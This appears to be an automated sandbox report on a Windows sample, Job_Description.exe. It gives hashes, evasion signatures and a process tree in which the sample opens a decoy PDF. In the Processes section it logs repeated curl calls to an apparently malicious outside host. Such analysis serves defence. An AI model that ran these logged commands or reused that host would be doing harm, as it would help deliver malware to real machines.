Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
573s -
max time network
575s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
31/12/2022, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
Job_Description.exe
Resource
win10v2004-20220812-en
General
-
Target
Job_Description.exe
-
Size
158KB
-
MD5
931d0969654af3f77fc1dab9e2bd66b1
-
SHA1
7cf53577520861a1833ae99489c307f98da01b4b
-
SHA256
f14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22
-
SHA512
285a0b32acdb79a7a83de073a3db74bde507cf219ed686b05b866c345e09c893526cdbc4daaa55cf0b3f3176ccee9f30ae14c3e75adaf5239918230e0da41798
-
SSDEEP
3072:PXbMMsw6csaVqBuH9HJt+BvgDzuLlTlB:YFwnlwBK9f+04lTH
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Job_Description.exe -
Loads dropped DLL 1 IoCs
pid Process 4352 Job_Description.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings Job_Description.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4352 Job_Description.exe 4352 Job_Description.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2232 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe 2232 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4352 wrote to memory of 2232 4352 Job_Description.exe 80 PID 4352 wrote to memory of 2232 4352 Job_Description.exe 80 PID 4352 wrote to memory of 2232 4352 Job_Description.exe 80 PID 4352 wrote to memory of 2184 4352 Job_Description.exe 81 PID 4352 wrote to memory of 2184 4352 Job_Description.exe 81 PID 2232 wrote to memory of 4300 2232 AcroRd32.exe 86 PID 2232 wrote to memory of 4300 2232 AcroRd32.exe 86 PID 2232 wrote to memory of 4300 2232 AcroRd32.exe 86 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 64 4300 RdrCEF.exe 89 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90 PID 4300 wrote to memory of 2540 4300 RdrCEF.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\Job_Description.exe"C:\Users\Admin\AppData\Local\Temp\Job_Description.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Job_Description.pdf"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FDFB9D40AC4508A4BD233F5C7338D08B --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:64
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=ECBC42AF314F3DEC20C57A795A3F63DD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=ECBC42AF314F3DEC20C57A795A3F63DD --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:14⤵PID:2540
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0A955724283FC6691B6537958AEEDB6F --mojo-platform-channel-handle=2188 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:1972
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=179939B8DF44C988A046B289BB0BA00C --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:2664
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BA0DCD1D1B2CF0F961D606AFAF1544C6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BA0DCD1D1B2CF0F961D606AFAF1544C6 --renderer-client-id=6 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job /prefetch:14⤵PID:1720
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=79F6CD7EF58C37111E34F1093F635A1B --mojo-platform-channel-handle=2440 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4592
-
-
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:2184
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:368
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:2484
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:2084
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:1888
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:3500
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:1036
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:4664
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:632
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:2828
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:4544
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:4112
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:1236
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:4956
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:3508
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:1740
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:4336
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:2576
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:616
-
-
C:\Windows\SYSTEM32\curl.execurl -A cur1-agent -L https://azure.protection-service.cloud/GJ4EDAp_dNg/lIHlIP4QM7/GQKGPNuo4R/c5njZjK9Tq/J7rC%2BBrm/ZoQVg%3D%3D -s -d dl2⤵PID:4400
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4712
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
172KB
MD5599e59effa5ff3db57b3b3d96fbd68bf
SHA168bec45bfc58373778d15255dce41edd5a10d1bc
SHA256e04848c1e2908335975dd52793c94624d06a598fdd75d5d3eb6ea8c5d569b8bc
SHA512abc7fb542e95fc40617582873b87f13b97d32d8a7ece5473bee3ffd30cc4932079fe3540a8c6fc47da6774d1ea286f1b2ea7c7d0009e0c7a17ab726f34f3fd71